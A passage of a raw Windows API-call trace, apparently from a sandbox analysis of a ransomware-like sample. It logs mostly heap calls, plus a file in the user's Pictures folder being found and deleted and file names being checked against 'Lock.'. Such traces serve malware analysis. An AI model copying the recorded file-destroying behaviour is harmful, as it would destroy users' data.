Flags=0x0, Size=0x8) returned 0x2e54e98 [0247.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0247.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0247.712] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0247.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0247.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0247.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51460 [0247.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0247.712] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0247.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0247.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0247.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0247.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0247.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0247.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0247.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0247.713] FreeLibrary (hLibModule=0x756e0000) returned 1 [0247.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0247.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0247.713] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0247.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0247.713] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0247.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0247.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0247.713] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0247.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0247.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0247.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0247.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0247.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0247.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0247.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0247.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0247.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51520 [0247.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513d0 [0247.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51430 [0247.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0247.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514c0 [0247.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0247.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0247.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513b8 [0247.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0247.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0247.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0247.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0247.714] CloseHandle (hObject=0x2d0) returned 1 [0247.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0247.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0247.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0247.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0247.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0247.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0247.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0247.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0247.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0247.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0247.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0247.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0247.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0247.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0247.716] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0247.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0247.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0247.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0247.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0247.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0247.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0247.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0247.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0247.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51568 [0247.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51430 [0247.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51328 [0247.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0247.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51550 [0247.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0247.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0247.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51370 [0247.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0247.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0247.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0247.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0247.717] CloseHandle (hObject=0x2a0) returned 1 [0247.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0247.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0247.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0247.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0247.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0247.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0247.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0247.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0247.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0247.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0247.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0247.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0247.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0247.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0247.721] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0247.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0247.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0247.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0247.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0247.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0247.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0247.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0247.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0247.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0247.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0247.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0247.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0247.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0247.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0247.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0247.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0247.722] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0247.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0247.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0247.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0247.723] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0247.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0247.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0247.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0247.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0247.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0247.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0247.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0247.723] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/abBnrhJwU.gif", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\abBnrhJwU.gif", lpFilePart=0x8cedf4*="abBnrhJwU.gif") returned 0x26 [0247.723] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\abBnrhJwU.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\abbnrhjwu.gif")) returned 0x20 [0247.724] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\abBnrhJwU.gif", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76cde0e0, ftCreationTime.dwHighDateTime=0x1d5ee61, ftLastAccessTime.dwLowDateTime=0x92196850, ftLastAccessTime.dwHighDateTime=0x1d5ede5, ftLastWriteTime.dwLowDateTime=0x92196850, ftLastWriteTime.dwHighDateTime=0x1d5ede5, nFileSizeHigh=0x0, nFileSizeLow=0x17863, dwReserved0=0x1, dwReserved1=0x1c, cFileName="abBnrhJwU.gif", cAlternateFileName="ABBNRH~1.GIF")) returned 0xa87590 [0247.724] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\abBnrhJwU.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\abbnrhjwu.gif")) returned 1 [0247.765] FindNextFileW (in: hFindFile=0xa87590, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76cde0e0, ftCreationTime.dwHighDateTime=0x1d5ee61, ftLastAccessTime.dwLowDateTime=0x92196850, ftLastAccessTime.dwHighDateTime=0x1d5ede5, ftLastWriteTime.dwLowDateTime=0x92196850, ftLastWriteTime.dwHighDateTime=0x1d5ede5, nFileSizeHigh=0x0, nFileSizeLow=0x17863, dwReserved0=0x1, dwReserved1=0x1c, cFileName="abBnrhJwU.gif", cAlternateFileName="ABBNRH~1.GIF")) returned 0 [0247.765] FindClose (in: hFindFile=0xa87590 | out: hFindFile=0xa87590) returned 1 [0247.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0247.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0247.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0247.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0247.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0247.766] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0247.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0247.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0247.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0247.766] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0247.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0247.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0247.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0247.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0247.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0247.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0247.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0247.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0247.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0247.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0247.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0247.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0247.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0247.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0247.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0247.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0247.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0247.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0247.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0247.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0247.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0247.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4e) returned 0x2e58910 [0247.767] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/abBnrhJwU.gif", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\abBnrhJwU.gif", lpFilePart=0x8cf650*="abBnrhJwU.gif") returned 0x26 [0247.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0247.767] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\abBnrhJwU.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\abbnrhjwu.gif")) returned 0xffffffff [0247.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0247.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0247.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0247.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0247.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0247.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0247.767] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0247.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0247.767] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0247.767] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0247.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0247.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0247.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0247.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0247.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0247.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0247.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0247.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0247.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0247.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0247.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0247.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0247.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0247.768] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BspkZBQYHi.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0247.768] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="spkZBQYHi.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0247.768] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pkZBQYHi.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0247.768] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kZBQYHi.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0247.768] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZBQYHi.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0247.768] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BQYHi.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0247.768] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QYHi.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0247.768] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YHi.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0247.768] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Hi.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0247.768] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0247.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0247.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0247.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0247.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0247.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0247.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0247.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0247.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0247.768] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0247.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0247.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0247.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0247.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0247.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0247.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0247.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0247.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0247.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0247.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0247.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0247.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0247.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0247.769] RtlAllocateHeap 